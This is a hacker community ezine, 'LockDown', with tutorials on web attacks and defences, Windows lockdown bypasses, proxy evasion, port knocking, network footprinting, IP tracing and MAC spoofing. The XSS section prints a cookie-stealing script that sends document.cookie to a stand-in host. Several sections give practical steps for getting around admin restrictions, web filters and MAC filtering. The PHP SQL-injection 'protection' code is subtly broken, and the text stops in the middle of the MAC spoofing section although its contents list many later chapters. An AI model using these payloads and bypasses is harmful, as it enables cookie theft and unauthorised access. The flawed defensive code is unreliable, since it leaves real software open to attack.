lockdown_-_hackers_ebook

LockDown ContentsIntroduction..........................................................4

Shout Outs.......................................................5Net Based Attacks................................................6

SQL Injection..................................................6Session Hijacking............................................7

CSRF................................................................7Local Attacks......................................................11

Bypassing local admin (Windows)................11Adding & Modifying Icons on the Desktop....11Accessing the Control Panel...........................12Accessing Web Sites.......................................13

Local Security....................................................15Port Knocking................................................15

Introduction....................................................15Server-side configuration................................15Client-side scripts...........................................16Some bitch-talk...............................................17Added note.....................................................17

Forensics & Enumeration...................................18Beginners Guide to Footprinting...................18

Introduction....................................................18Ping Sweeps...................................................19Port Scanning.................................................19Port Validation................................................20Operating system Identification......................20Network enumeration.....................................21Obtaining Network Hardware vendor.............21

Beginners Guide to IP Tracking....................22IP Location & Tracking..................................22Finding Active connections (Trojan Hunting) 22Finding an IP through a chat application........23IP Tracing.......................................................23PING..............................................................23TRACERT......................................................24IP Research.....................................................24Email Headers................................................24Conclusion......................................................25

Dirty MAC Spoofing.....................................27Why Why Why?.............................................27Implementing a spoofed MAC.......................27

Cryptography......................................................29A little about Cryptography...........................29

Classical Crytography - Stupidity, Substitution, Transposition, Overconfidence.......................29Vigenere Cipher..............................................32Modern Cryptography - Formalizing, Types of Attack, Perfect Secrecy...................................33Mathematically Speaking...............................33Practical Ciphers - Stream Ciphers.................35A Real Stream Cipher.....................................36Cellular Telephones - A5/1.............................37

CSPRNGs and Secure Stream Ciphers...........38Block Ciphers.................................................38RSA and Friends.............................................40The Rabin Cryptosystem................................41RSA in detail..................................................42Diffie-Hellman Key Exchange.......................43The ElGamal Signature Scheme.....................44OpenSSL........................................................45Final Thoughts................................................47Miscellaneous.................................................47Off-topic.........................................................49

Social Engineering.............................................50What is Social Engineering?...........................50So its hacking.....?...........................................50So its psychology.....?.....................................50

Case Study.....................................................51Conclusion:.....................................................53

Basic Psychology...........................................53Security in Communities................................54Conclusion......................................................55

SSH Tutorials.....................................................56SSH Tunneling Explained.............................56How to Configure SSH..................................59

Programming Tutorials.......................................63Forth..............................................................63Creating libraries in C/C++...........................69

Static libraries.................................................69Shared libraries...............................................73Dynamic Libraries..........................................76dlopen() flags..................................................78Summary........................................................79

General/Miscellaneous.......................................80Base Conversion Tutorial..............................80A Brief Introduction to Ipv6..........................84

Address Structure...........................................84Simplifying of Zeros.......................................84Using the Addresses.......................................86Comments......................................................86

A Brief Introduction to IPv6 – Part 2............87Setting up IPv6 in Windows...........................87Setting up IPv6 for Linux...............................87SSH & Interfaces(Linux)................................88Comments......................................................88

Changing the Grub Splash Screen.................89US Members Projects.........................................91

USL (Underground Systems Linux)...............91Closecrypt Encryption System........................91US New Post Perl Script.................................91Rapid Hacker .................................................92Proxy Ripper v1.0...........................................92USSR..............................................................92

IntroductionWelcome to the first edition of LockDown, an ezine released by the community of UndergroundSystems.org. This collection of tutorials and papers have been written solely by US (Underground Systems) members and credit will be given where due.

Its finally here, the first proper US Ebook! Ive threatened for so long to get this out before under the name of 'US Hackers Desk Reference' and due to the amount of support Ive received this time round I can safely say that lads, this is it. The formatting isn't colorful or decorative but its not suppose to be. The idea is this entire document is ready for print as soon as you want. Its easily readable and easily navigable (except Yuips cryptography section... very difficult to categorize all of it). Maybe we will release a graphical one at some point but I like the concept as it stands here.

Unfortunately due to time constraints t0nedef couldn't edit this entire document... so that technically means you can expect bad grammar on my part. But I do lay credit to him for trying to contribute alongside dothacker who also had too much going on in his life to help.

This is a big moment for me and id like to take this time to say thanks to everyone who entered the US Graphics Competition for the front cover. Firmware won it in the end but all 3 entries were to say the least, competitive. So well done Firmware, 3 US competitions won... you are the king... but you still cant do fractals like Narada.

I would like to thank everyone at US for the support of this Ebook. Many people were willing to offer their articles and there was plenty to go in this issue and in turn have created a concoction of lessons to pass onto the new guys joining our community. This could be the beginning of a complete series of ebooks who knows! If it gets any bigger though im going to need help, but anyways, I would like to thank Kem the US founder for initially creating the community and every senior member who has helped him keep it in order. This ones for you guys... enjoy!

I still feel we havnt even scraped the surface of what this community can offer. Lets hope if the 2nd

book ever gets here everyone throws in their 2 cents\pence.

So on with the show. Enjoy the book and please leave feedback at UndergroundSystems.org.

- Linx

And now a few words from everyone who contributed to the community and the book...

Shout OutsGive a kid some code and make him h4xX0r for a day.

Teach a kid to program and make him h4xX0r for a lifetime.

- Tux -

Shout Out to Underground Systems for giving me the opportunity and inspiration to share and distribute knowledge!

- Xiao Tan -

I want to thank the whole US community for helping me to improve and get better as a human being and as a self respected geek, and I want to give a special thank you to Gnome and

Narada....... ooh shit I forgot ... and t0nedef.

- d4de -

I would like to like to say thanks to BlackJackHker, his own personal Jesus Christ, Narada for being somebody for him to look up to, and to Neurox/Technofreak for being his mentor for the

past two years. The latter made all of this possible. Only the birds fly first class, people.

- FirmWare -

Nobody's perfect. Hackers prefer to be "nobodys", so that makes us perfect

- Blue Devil -

One cannot learn how to hack. It isn't until you get a full grasp of this concept, that you can call yourself a true hacker.

- BlackJack -

Net Based AttacksSQL InjectionAuthor: AaronThere is a great tutorial on SQL injection elsewhere. If you are unsure of what it is, read the article on Rest0re.

Now, protection from SQL injection. This will be demonstrated in PHP, mainly because PHP is the most commonly known language, and I don't know plain ASP.

Your code can look like

PHP Code:$_GET['id] = $id;

$query = mysql_query("DELETE * FROM `user` WHERE `id`=$id");

Now, some of the devious minds might want to have you select a different user, or SQL inject you, and that is bad. One way I like to protect from this is to use sprintf().

Sprintf will make sure that your code is valid before entering it into the query.

PHP Code:$id = '5 OR id != 0';

$szSQL = sprintf(" DELETE FROM myTable WHERE id = %d", $id,mysql_real_escape_string($IfTherWasAStringVerifyOnIt'sOwnLine));

And your entire user table was just saved.

How does this work? Sprintf works like printf in C, or strings in C#, but it validates the data.

Code: // This is a console string in C#//System.Console.WriteLine("My {0} itches.","computer");

So, it just substitutes any string after the initial string into the original string like an array.

Take another look at Sprintf() above. It does the same exact thing, except with %d. %d is a numerical identifier. If %d isn't numerical it will MAKE it numerical... Okay, it prevents deletion of everything in your table, but not a single row. that single row could be you! Sprintf()'s power is in cleaning up your code. However, sometimes you need additional help.

PHP Code:try { if (ctype_alpha($_GET['id']){ throw new exception("Epic Phail. Your ID isn't a string.") }}catch (exception $e){ echo $e->getMessage();}

and there you have it. If you did that for everything, you would have a MESSY code block. That's why I like sprintf.

Session HijackingI give you a link to some site on AIM and mask the link:<a href="www.example.com?SESSID=666>Hot Nude Pictures</a> (okay, my spam filter isn't perfect GHASP, I just gave you a link to a site you were logged into. GHASP, I follow the link andddd.... I gotz your session now. (I actually made this work too ) Oh wait! Look! It's a bird! It's a plane! It's session_regenerate_id() coming to save the day!

A session is terminated once a user leaves a site. Sites use 'remember me' cookies to keep some unique identifier of the user. It could be the users ID. If it isn't hashed, you should just stop developing.

The PHP gets the unique cookie if it exists. It sends a query to the database and generates the session with all the information that it needs. BUUUT the session id will be what was thrown into the $_GET identifier. You can unregister globals, but that is Wayyyy outside the scope of this post.

When the session is generated, the Session ID should be regenerated. That way, you cannot hijack a session. However, you can go a step further. Store the user agent and the IP of the user in the session, and check it to what they offer. If their IP changes, or if their browser changes (we can't rely just on browsers anymore, everyone is using firefox ), terminate the session and any 'remember me' cookies.

CSRFHere is a quick summary of CSRF:Maz wants to deviously make someone buy something on some e-commerce site. He reads through some stuff on how browsers process and request pages. He learns that browsers make you send a request to a page in src attributes.

Let me further explain. When you get the logo in this site, your browser makes a request to http://www.undergroundsystems.org/fo...gbannernew.jpg. The aforementioned page gives its contents (an image) to the page requesting it.

This means Maz's devious URL would be in an image, with the src of the devious site. Now, the devious site would need to use $_GET (or worse... $_REQUEST...), because POST CSRF is extremely hard to pull off, and would take much longer to explain.

The trick of this was explained, but I glossed over the deciding factor: the user needs to be logged in.

SolutionSession variables should always carry a unique identifier. A random token. Anything. Because I am so nice, I'll release my password generator (I actually use this for my password on web sites and stuff! )

PHP Code:<?php// Create a random string and echo it out.

$szLength = 50;$szString = '';// Different security levels$lvl[0] = 'abcdefghijklmnopqrstuvwxyz';$lvl[1] = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ';$lvl[2] = '1234567890';

// Heredoc just makes life easier$lvl[3] =<<<EOF `~!@#$%^&*()_+-=[]{}|;':",./<>?\'EOF;

// 100 Fun Characters$lvl[4] =<<<EOF °÷ú?²¶¼?ÅïÌ¡ç¬?¿í¤¸äÏ´óÍ³ÚÊâüãæËÁ½ÇÀÎ¢×¨ÒîÈñ¯Ñù¦ëý§ûÖÞÛ¹ÃÄÝªèéõåÓ~ØÙðÆ¥á»öÜ£ò*«º?¾Õ·®µ±Â?ôìþêÉøÐÔßàEOF;

for ($c = 0; $c <= $szLength; $c++){ // har har, c++ // Choose a Level $level = rand(0,4); // Perform three checks to further randomize string if ($level == $lastLevel) $level = rand(0,4); if ($level == $lastLevel) $level = rand(0,4); if ($level == $lastLevel) $level = rand(0,4);

$randChar = substr($lvl[$level], rand(0, strlen($lvl[$level])-1), 1); $szString .= $randChar; $lastLevel = $level;

if ($szString == "") echo "WTF!!";}

echo $szString;?>

Using a 50 character token is a little much. So are my 100 Fun Characters (that's my line, noone take it.) Just use 10 characters.

When you display a form, give it a hidden field with the users token. The site would be extremely hard pressed to get the random token. If you randomize the number of characters (change $szLength to rand(10,50), it would have less than a 1% chance to get it correct.

On the PHP script, check everything. You can go even further, but that's not necessary.

If you want to prevent $_POST CSRF, you need to follow the above. It works for everything. If you want to protect yourself from CSRF, form spoofs, or XSS, unique tokens pwn.Code InjectionCode injection is more or less the same thing as XSS.It's a pain to explain, so I will just put up an example.

For this example to work, VBulletin has to be security trashed.Some evil person on this board wants to steal peoples cookies. (web cookies)He deviously makes a topic on this site in the Introduction area like the following:

Code:HAI! LOL TEECH Meh TO H4XX PL0X!! I WANTZ TO BE KOOL n H4X HOTMAIL!!11[one]! PL0X L()L I Hve (insert skiddie tool here)<script>document.location = ’’http://example.org/getcookies.php?cookies=’’+ document.cookie;</script>

This has got to be the most easy to pull off trick in the book. When people sanitize a query, they normally do something such as the following:

PHP Code:$query = mysql_real_escape_string($query)

That only protects your DATABASE. It does not protect your users. I <3 my users, unlike you other bastards >.> (Microsoft)

Protecting your users:

PHP Code:htmlentities($anyOutputWhatsoeverUnlessIfItHasAttributes)

Finished... I kinda jumped around on this, so if there is something I kinda didn't finish, it would be great if you told me

Local Attacks

Bypassing local admin (Windows)Author: Linx

Many times we have logged onto a computer where we are locked down beyond belief. We cant even right click the desktop, access to the run menu is unavailable, access to the floppy drive is disabled and many others. Heres all the tricks (the ones i remember) that I have used now and in the past to get what I need from a restricted system.

Adding & Modifying Icons on the DesktopSometimes we need to access things that are installed but not accessible for some other reason. For arguments sake, you know Internet Explorer is installed however you cannot access the folder in which it is stored.

A few tricks for this one.

To create an icon… try the following

Right click>create icon (im stating this as it may not work)

Go into the start menu and drag a random application onto the desktop

Now we need to modify the icon so try this. If right click is disabled highlight the icon and press Alt + Enter to bring up the properties bar. Bring up the target bar and redirect it to the application of your choice (i.e. c:\windows\system32\cmd.exe)

Also I discovered this on my travels, I believe it was distributed (and possibly created by) Wang. Wang, last time I remember hearing about him, was a leader in the Red Brigade of the Cyberarmy.net, visit them sometime.

Fill in the correct information and this script will create a desktop shortcut icon…

Code:

Dim WSHShell, MyShortcut, MyDesktop, DesktopPath, FileSysset FileSys = CreateObject ("scripting.FileSystemObject")Set WSHShell = Wscript.CreateObject("WScript.Shell")DesktopPath = WSHShell.SpecialFolders("Desktop")Set MyShortcut = WSHShell.CreateShortcut(DesktopPath & "\mylink.lnk")MyShortcut.TargetPath = "the full path to the target file"MyShortcut.WorkingDirectory = "the working directory for the file, i.e. the path to the folder it is in"

MyShortcut.WindowStyle = 4MyShortcut.IconLocation = "the full path to the target file"MyShortcut.SaveMsgBox "Done", vbinformation, "Done"

You could even try exploiting the autorun CD function (although im not sure if it works in screensaver mode on XP). This is set to enable by default on all Windows packages as far as im aware. If you developed a script to create many shortcuts on your desktop you could just run it anywhere you wanted by sticking a CD in the drive. Maybe create multiple icons pointing to cpl extensions and apps you will need to fullfill your bidding, maybe even also run an admin script.

Accessing the Control Panel...In some systems the control panel can become unavailable. The control panel works by having files with *.cpl extensions hidden within the system32 folder. You can locate these in the one of the following addresses

Code:

c:\windows\system32c:\winnt\system32

These files can be double clicked like any normal app and will load like any normal application. The following is a translation of what all the files will open...

+ Access.cpl - Accessibility options

+ Appwiz.cpl – Add/Remove Programs

+ Desk.cpl – Display Properties

+ Hdwwiz.cpl – Add Hardware Wizard

+ igfxcpl.cpl – Intel Graphics Controller (You may not have this one)

+ inetcpl.cpl – Internet Properties

+ intl.cpl – Regional & Language Options

+ joy.cpl – Game Controllers

+ main.cpl – Mouse Properties

+ mmsys.cpl – Sounds & Audio Devices

+ nusrmgr.cpl – New User Accounts

+ odbccp32.cpl – ODBC Data Source Administrator

+ powercfg.cpl – Power Configurations

+ prefscpl.cpl - Preferences

+ sysdm.cpl – System Properties

+ telephon.cpl – Location Information (dial up)

+ timedate.cpl – Time & Date

+ wuaucpl.cpl – Automatic Updates

OK that’s all of the cpl files on my system now. There’s one other alternative if you do not have access to the explorer menu.

Open up a “Help” box on the desktop. Either click start -> Help & Support, or click the desktop in an open space and press F1. Run a search for “Add/Remove”. This will bring up an article on how to add and remove apps. It will also display a link to the Appwiz.cpl.

Accessing Web Sites...So many different ways around this one… I will number them…

1. Try creating a redirect at http://www.cjb.net

2. Convert the hostname to an IP (Numerous converters available out there)

3. If the IP fails try configuring explorer to use another proxy.

4. Try converting the IP to a “DIP” (Defunct Internet Protocol). Tutorial for this is below, thanks to Wang for this one.

Quote:

Wangs Haq Faq Vol.5

Optiklenz from "Legions Of the Underground" has a method called the ' Defunct IP Protocol' which may just work:

If you take an IP in standard form, and convert it to a defunct IP (this is how optiklenz refers to it) the defunct IP will still work just like the normal IP, but because it has no decimals separating segments it is perceived as an Intranet host rather than an IP - and Intranet hosts usually have very little security precautions assigned to them.

Here is optiklenz's description of how a defunct IP is created form a standard IP:

Seeing that IP's are 32 bits in 4 8bit segments. If you take 32 (bits of the ip) and multiply it by 8(bits of each ip segment) you get 256 bits or a cluster of 1's, and 0's depending on how you are looking at it. =]

The give an example of how we go from an IP in decimal form to a defunct ip. We'll use www.legions.org. Resolve the domain name. In this case we have 199.227.88.145:

[segments referred to as SEG]

********************

256| 3-2-1 method...

********************

32(8) = 256

|_SEG1(199)*256^3

|

SEG2(227)*256^2_+

|

SEG3(88)*256_+

|

SEG4(145)_+

|

145_+ -= 3353565329 (new identifier)

Defunct IP: The reason I call the new identifier a defunct IP is because when it goes through the above process it is no longer decimal form. So I refer to it as a "dead ip"

Now, this defunct IP is no longer really an IP and therefore any security implementations that occur for an IP address are no longer present. So, to answer the question above, If you have access to a computer where internet sites are blocked behind a proxy, you can use the defunct IP so that the security measures no longer apply.

E.G.

www.legions.org >> Blocked by Proxy

199.227.88.145 (IP of www.legions.org) >> Blocked by Proxy

3353565329 (Defunct IP for www.legions.org) >> Allowed

That concludes this basic tutorial.

Local SecurityPort KnockingAuthor: TuxI've just managed to set up port knocking on one of my servers using only iptables and basic scripting to help me. I though i'd share how i did.

IntroductionYou will need a working *NIX environment with iptables installed. And of course a port you want to hide. In words the process of doing this can be described as following:

1. Connect to a predefined sequence of closed ports. Each of these connections will get logged.

2. When the firewall have detected that a "knocking" have been completed it opens the port, but only for 5 seconds.

3. The client connects and port closes. But your connection will be alive because we configure the firewall to let through established connections.

This technique will not work for a web server or some other protocol where the connection isn't kept alive but closed until a new request is made.

Server-side configurationBegin by creating a new file called temp.sh in some folder you have access to.Then put this in it:

Code:

/sbin/iptables -A INPUT -m state --state ESTABLISHED -j ACCEPT/sbin/iptables -A INPUT -m state --state RELATED -j ACCEPT

/sbin/iptables -N INTO-PHASE2/sbin/iptables -A INTO-PHASE2 -m recent --name PHASE1 --remove/sbin/iptables -A INTO-PHASE2 -m recent --name PHASE2 --set/sbin/iptables -A INTO-PHASE2 -j LOG --log-prefix "INTO PHASE2: "

/sbin/iptables -N INTO-PHASE3/sbin/iptables -A INTO-PHASE3 -m recent --name PHASE2 --remove/sbin/iptables -A INTO-PHASE3 -m recent --name PHASE3 --set/sbin/iptables -A INTO-PHASE3 -j LOG --log-prefix "INTO PHASE3: "

/sbin/iptables -N INTO-PHASE4/sbin/iptables -A INTO-PHASE4 -m recent --name PHASE3 --remove/sbin/iptables -A INTO-PHASE4 -m recent --name PHASE4 --set

/sbin/iptables -A INTO-PHASE4 -j LOG --log-prefix "INTO PHASE4: "

/sbin/iptables -A INPUT -m recent --update --name PHASE1

/sbin/iptables -A INPUT -p tcp --dport 111 -m recent --set --name PHASE1/sbin/iptables -A INPUT -p tcp --dport 222 -m recent --rcheck --name PHASE1 -j INTO-PHASE2/sbin/iptables -A INPUT -p tcp --dport 333 -m recent --rcheck --name PHASE2 -j INTO-PHASE3/sbin/iptables -A INPUT -p tcp --dport 444 -m recent --rcheck --name PHASE3 -j INTO-PHASE4

/sbin/iptables -I INPUT -p tcp --dport 22 -m recent --rcheck --seconds 5 --name PHASE4 -j ACCEPT

/sbin/iptables -A INPUT -p tcp --dport 22 -j DROP

The first block is for allowing already established connections to pass through the firewall. The next four is the lines that check the firewall logs after the port sequence. The lines after those defines the secret sequence and should be changed to something only you know. The 111, 222, 333 and 444 is the port numbers that you need to connect to in this order.

The line after that is what will happen on a successful "knocking". The 22 is the port to be opened and the 5 is the amount of seconds i should be open. Don't worry about it only being 5 seconds, that's enough for an application to start a connection and once that's done you're past the firewall.

The very last line is for making the port (in this case 22) being closed as default or else this whole thing is pointless.

After this is done, type the following commands to activate this configuration and save it as the default together with your other firewall rules.

Code:

chmod +x temp.sh./temp.shiptables-save > /etc/iptables.up.rules

That was server-side. No on to the client.

Client-side scriptsI'm assuming that your client is also a UNIX one. You have lots of ways to connect but i'll just be showing two here:

Code:

netcat -z <hostname/ip of server> port1 port2 port3 port4; ssh user@hosteg: netcat -z example.org 111 222 333 444; ssh [email protected]

You can also create a shell script called /bin/pk with this content:

Code:

for PORT in 111 222 333 444; do \ nmap -P0 -sT -p$PORT --host_timeout 1501 $1; \ done; \ ssh $2@$1

Make it executable with 'chmod +x /bin/pk' and the run it like this:

Code:

pk hostname/ip usereg: pk example.org root

Now we have a working port-knocking configuration.

Some bitch-talkThis tutorial isn't really mine to 100%, I've based mine on this page (http://www.debian-administration.org/articles/268).

Also note that this is only tested on debian. Both my server and client is running debian 4.0. But it should work almost everywhere. You windows guys will have to find your own way to knock ports. Maybe the win32 client found here can help you (http://www.zeroflux.org/cgi-bin/cvstrac.cgi/knock/wiki).

I know this can be done very easy with knockd (tut here (http://gentoo-wiki.com/HOWTO_Port_Knocking)) and shimmerd (http://shimmer.sourceforge.net/) but i didn't feel like having another service running that eats resources when i could do it with thing built into my kernel.

Added note...After lots of time trying figure out how the fuck Visual C++ 2008 works i managed to compile a knocking client for windows. You can find it here (http://tux.h4xx.se/files/knock.exe).

Works as following:

Code:

knock.exe <host/ip> port1 port2 port3 port4 ......eg: knock.exe example.com 111 222 333 444

The source for knock.exe can be found here (http://www.zeroflux.org/proj/knock/files/knock-win32.zip).

http://www.zeroflux.org/proj/knock/files/knock-win32.zip

http://www.zeroflux.org/proj/knock/files/knock-win32.zip

Forensics & EnumerationBeginners Guide to FootprintingAuthor: Linx

IntroductionFootprinting is the art of obtaining information on an computer and/or infrastructure using a variety of security tricks and tools. It is a form of recon that will allow you to "legally" gather information on a target system such as OS types, Server roles, network hardware manufacturers, key contacts, support details and much more.

We will discuss the following in this article:

+ Ping Sweeps

+ Port Scanning

+ Port Validation

+ OS Identification

+ Hardware Identification

Topics which ideally should be included in this tutorial as they are in the remit of finger printing, but are not due to my inability to create enthusiasm whilst writing are:

+ DNS queries

+ Social Engineering

+ Visual Network Mapping

The list goes on, but this should keep you going for a little while longer after reading through this tutorial.

In short it will be a scope on your target so you will, in theory, be able to pin point any possible bottlenecks and also equipment that is vulnerable to DoS attacks and other vulnerabilities or bugs.

For the purpose of simplicity some of the examples used within this article assume that are on already on a LAN and are internally scoping the network.

Ping SweepsPing sweeps do exactly what they say on the tin. The sweep a range of IP addresses determined by the end user input and ping every IP address in that range and report if network connectivity is available on the target machine.

There used to be days when you could simply go nuts and not worry about a thing but now there are security restrictions in place. Perl scripts running on network servers to check for excesive ICMP activity and lock it down and servers now being configured to not respond at all to ping requests.

The tool everyone seems to use recently is the infamous NMAP. This comes in the forms of command line and GUI. NMAP can be set to scan in various modes, too many to mention, but the plus factor is that you can alter the "Stealth Factor" alongside other functions to aid in bypassing firewalls and other forms of IDS (Intrusion Detection Systems).

Port ScanningPorts on a PC come in 2 forms, software and hardware. Hardware ports are on the rear of your PC, they are serial ports, com ports, USB ports and so on. On the other hand you have software ports. These are not visible but essentially control openings to your PC. They are the equivelant of windows and doors on your house.

You can have them open, or closed. When they are open, you can get in, when they are closed, you cannot.

For example, port number 80 is open to allow HTTP (Hyper Text Transfer Protocol) packets to go in and out of the PC. If for some reason you wished to halt access to the internet using a firewall, you could simply just block port 80 to disallow all HTTP traffic.

There are many ports (65535 to be precise) and they are categorized into Registered and Unregistered. Should you wish to obtain a port list and information on categorization go to the wiki here (http://en.wikipedia.org/wiki/List_of...P_port_numbers).

Now moving back on track port scanning will allow us to check, remotely, all ports on a target machine and see if they are open.

Lets say port number 23 was displaying as open, this would mean that the users telnet port is open and possibly vulnerable to attack. Now this might seem fairly logical but theres several things you need to take into consideration...

Ports like 23, 80, 8080 and such like are "common ports" meaning that they are in use on a fair few machines. When you get to lesser known protocols and applications the protocols can be changed by the end user giving the wrong information to you... a perfect example is something like Sub7.

Sub7 by default runs off of port 27374. So due to most people not knowing about modifying the port preference, many Sub7 Trojans stay that way, hence 27374 is usually referred to as "Sub7's port". The catch is when someone changes that port to something else... lets say 500, now when you perform a port scan and you see port 500 open, you wont see it as Sub7, you will look through your port list and see (looks through port list.....) "ISAKMP, IKE-Internet Key Exchange" which is not Sub7.

So to sum up, port scanning can give you a basic grounding as to the services and applications running on a machine however they cannot be taken as gospel.

Port ValidationAs stated in the last paragraph you can never be sure if the port scanned matches the one in the list as the end user can change the port preference on many applications. To check this out we use a technique I call "Port Identification" (it may have a professional name, but i haven't heard it).

As we all know applications host themselves on ports, most commonly to gain access to the network/Internet to send/receive data. This usually means that the application will respond if certain data packets are sent to it. Lets use another analogy...

Port 1 - English speaking port

Port 2 - Spanish speaking port

Port 3 - Italian speaking port

Port 4 - German speaking port

Ok, so we've got ports that will respond to their own languages. But what happens if the German and Italian switch places? Well according to our list Italian is in 3 and German is in 4, whereas, in reality its vice versa.

So when we port scan we see that port 3 is open... so as far as we are aware we are looking at the Italian port... lets check this... we send some test data "Salve"... we get no response. We now know that the port is in fact NOT Italian... we try with more test data "Hello", no response, "Buenas Dias", no response, "Guten tag" and get a response.

Long winded but heres the real world scenario, after youve performed you port scan and identified that the port for VNC (Virtual Network Computing) is open, how can you confirm its VNC? You open up your VNC client and attempt to connect to it, youll get 2 responses, it will either ask you for a password and/or let you in if one is not set OR it will say "Cannot connect to client".

Operating system IdentificationTo determine the OS (Operating System) of a target IP we can use NMAP. Use the following

command line:

Code:

nmap -O 192.168.1.1

I think the above is right but I haven't tested it yet. This will basically finger print the OS of the target set... thats it really.

Network enumerationAfter you've performed trace routes to some target machines you will be able to ascertain where some of the network hardware is and also who its made by, maybe even get a model number.

The aim of this is to test for currently know faults with router hardware. There are many known Cisco vulnerabilities for example, which can be utilized to further you information gathering from this technique.

Obtaining Network Hardware vendorOK so you have an IP and for some reason want to know the hardware vendor of the network interface being used. For this we can use a variety of methods, i will discuss 2 from Windows boxes...

Should you have the fortunate luck to obtain the local admin password from somewhere you can use the "getmac" command. For more information type:

Code:

getmac /?

However for those of us who are scanning the network without the aid of administrator passwords we will use our ARP cache. Simply ping the machine, then straight after in command prompt type "arp -A" you will then see the IP address of the target machine and right by the side of it is the MAC address.

Now once you have the MAC you might want to know the vendor. To do this go to http://www.coffer.com/mac_find/ and follow the on screen instructions. Job done.

That sums this tutorial up... im leaving this job now and this was an old text file I was working on so its kind of incomplete. Have fun, shouts to all who critic peoples work, it gears them all on... FREE TIBET

Beginners Guide to IP TrackingAuthor: LinxThere was a revived post today so I thought seeming though im doing absolute sweet FA at work, id write a tutorial on IP tracking. Any questions please post.

IP Location & TrackingIP tracking is a fairly complex topic but to understand the basics requires little brain space to remember. What il discuss in this tutorial is how to get an IP using several methods, and also how to trace it back to its origin.

On top of this we will also discuss practical applications of the commands and tricks used as they would apply in a real world scenario.

Moving onto the first chapter....

Finding Active connections (Trojan Hunting)You may feel that an application and/or unauthenticated user is logged onto your machine remotely. This is a relatively basic way of identifying intruders on a Windows box.

Open up a command prompt window (Start>Run>"cmd").

Type "netstat -ano". This will display all active connections with ports and the associated PID(Process Identification) reference.

OK, now we open up the task manager (Ctrl+Alt+Del) and go to the "Processes" tab.

Click "View" then "Select Columns" and make sure that the "PID" box is checked. Click ok.

Now this will display the associated PID to the application.

Going back to the command prompt window I want you to take a random process and find its PID number in the table. When you have it run it against the list in the task manager and this will give you the corresponding application using this connection.

This method will be ideal to ascertain if certain applications that you are unaware of are actually Trojans of some sort.

Finding an IP through a chat applicationEveryone asks this so now il explain for good. Most chat applications run from a server. Chat messages are relayed from the end user to the server and then to the recipient. Because of this THEIR IP WILL NEVER BE REVEALED! The only way you will be able to obtain their IP through a chat program is to open a direct connection with them. This would be via a webcam or file transfer.

Once a file transfer/webcam has been initialized a direct connection between you and the recipient is opened. This is when you will be able to track them.

Before the file transfer open up a command prompt windows (Start>Run>"cmd")

Type "netstat -an" this will provide all active connections and port references

Now start the file transfer

Type "netstat -an" again and the list should be different... guess what.... its their IP

So thats how you can do it, no more questions.

IP TracingNow for the fun part. You have your IP and you want to know who they are and where they are.

This is really simple and il explain in the following chapter.

PINGIn the command prompt the "ping" command sends an ICMP echo request to the destination and in response the destination will send a packet back. This will then be reported on screen with connection speeds, TTL and maybe a hostname if your lucky amongst other useful information.

Code:

Syntax: ping <hostname>ping <IP>

In a real world scenario this is used to check network connectivity to users on a network. This would also alert you to connectivity issues (gamers refer to this as lag or maybe a lag spike). As a rule of thumb if your ping response times go over 35ms on a LAN theres issues, but saying that please don't forget that if your pinging a machine on the other side of the world, evidently it will

show in the response time.

TRACERTTrace route is an exceptionally useful command line utility, it checks every networks points connectivity on route to the destination. Essentially it checks response time and gives you the IP of every bit of hardware it passes through on route.

Code:

Syntax:tracert <hostname>tracert <IP>

In a real world scenario this can be used in conjunction with the ping command to verify any issues with connectivity. Chances are that if multiple users are affected by a network issue of some sort (be it just slow or a complete outage) tracert will show you where the bottleneck/issue is on the way.

IP ResearchOnce you have the IP addresses from the hacker/violater/spammer/noob we can then do some research on the IP. We do this many different ways and most *nix users will be competent in using the whois command. Unfortunately Winblows does not offer the whois command. There is an alternative command but il show you other ways instead.

If you go to http://www.samspade.org you will find yourself at an online whois lookup site. There are many out there but I've always used this.

If you type the IP address in and perform the lookup it will reveal a wealth of information about the target. This will include geographical locations, support contact numbers, registered owners and more.

In the real world this could be used to track spam mails to phony sites, it can also be heavily utilized by social engineers in order to increase their information on a target with helpdesk numbers and office names.

There are alternative sites with nice pictures for the more aesthetically minded people. The best one I've found is http://whatismyipaddress.com. This will provide a nice little map for you but essentially it will do the same job as Sam Spade.

Email HeadersIve left this till last because its kind of a different topic but the essence of what im trying to teach is still here. Were going to discuss how to track your email back to its sender.

I'm going to use Outlook as an example of how to obtain headers, it may differ with other applications.

Within Outlook (2003) open up the mail by double clicking it.

Click "View" then "Options" in the menu bar.

The headers are in the box at the bottom of the dialog box.

Looking at these and understanding them is a tutorial on its own so im going to give you a crash course...

Firstly this box is tiny so select all the text and copy it into notepad (I don't use anything else). You see on the left hand side you have "Received:"? This is essentially like a hop when using trace route. It displays the mail servers this email went through to get to you. There may be multiple hops especially if your within a company network with a larger mail infrastructure.

Find the last "Received:" tag.

Code:

Received: from COMPUTER10 ([84.16.136.123])by mailhost2.some.company.com (8.13.6/8.13.6) with SMTP id m2JDmFcM003526;Tue, 19 Feb 2008 12:48:55 GMT

Date: Tue, 19 Feb 2008 15:41:49 +0300From: "La Scala Casino" <[email protected]>Message-ID: <[email protected]>

Ok ive modified my mail servers for obvious reasons but the spammer remains the same. This was a genuine email I received today. As you can see the email originally came from COMPUTER10 (IP address of 84.16.136.123) and was sent to our corporate mail server.

By running the above diagnostics displayed in this tutorial you will find that this server is in Russia (Moscow to be precise). You have the sys admins details including contact numbers office locations etc etc..... a social engineers favorite thing, names and numbers.

ConclusionThis is a basic insight into tracking and it gets alot more involved. Theres literally thousands of methods, its a case of trial and error. Apologies for spelling errors, I did this in notepad and not Word/Wordpad. Have fun, peace out.

Dirty MAC SpoofingAuthor: LinxHey guys, Ive known this for a while yet I just realized Ive never posted it! Damn me for not sharing. Well... im bored... again.... its my lunch break... and i have no cigarettes left... so here we go.

Welcome to the short tip (possibly one of many) to aid all you security conscious engineers out there. Today boys and girls we are going to discuss MAC spoofing from the view of a Windows user.

Now, MAC spoofing is the art of... well... spoofing your MAC address. Your MAC address if 12 alpha numeric digits long and identifies your network hardware (your Network Interface Card).

It is usually displayed as something like "12:34:56:AB:CD:EF"

The first 6 digits identify the hardware vendor, and the last 6 are a serial registered to that piece of specific equipment.

Why Why Why?"But why would I want to lie about that?" i hear you cry!!!

On most routers these days the option for MAC filtering can be enabled. This will entitle the end user to advise the router exactly what individual computers and external hardware (i.e. Xbox's, PS3's, PSP, palms, laptops etc) can use the local network.

This will in a sense block all LAN traffic from sets that are not on the MAC filtered list.

So if we actually have a MAC of someone on the network we can pose as them. Our hostname may be different, however, the MAC wont.

